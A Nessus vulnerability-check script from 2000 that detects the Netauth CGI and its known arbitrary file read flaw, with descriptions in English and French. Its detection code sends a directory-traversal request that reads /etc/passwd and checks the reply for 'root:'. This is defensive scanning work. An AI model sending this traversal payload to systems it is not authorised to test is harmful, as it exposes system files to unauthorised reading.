#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10494);

 
 name["english"] = "Netauth";
 name["francais"] = "Netauth";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "The 'Netauth' cgi is installed. This CGI has
a well known security flaw that lets anyone read arbitrary
files with the privileges of the http daemon (root or nobody).

Solution : Get the latest version at http://netwinsite.com/netauth/
Risk factor : Serious";


 desc["francais"] = "Le cgi 'Netauth' est install. Celui-ci possde
un problme de scurit bien connu qui permet  n'importe qui de faire
lire des fichiers arbitraires au daemon http, avec les privilges
de celui-ci (root ou nobody). 

Solution : Mettez-le  jour (http://netwinsite.com/netauth/)
Facteur de risque : Srieux";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Checks for the presence of /cgi-bin/netauth.cgi";
 summary["francais"] = "Vrifie la prsence de /cgi-bin/netauth.cgi";
 
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

port = is_cgi_installed("netauth.cgi");
if(port)
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  data = string("GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd HTTP/1.0\r\n\r\n");
  send(socket:soc, data:data);
  buf = recv(socket:soc, length:2048);
  if("root:" >< buf)security_hole(port);
 }
}
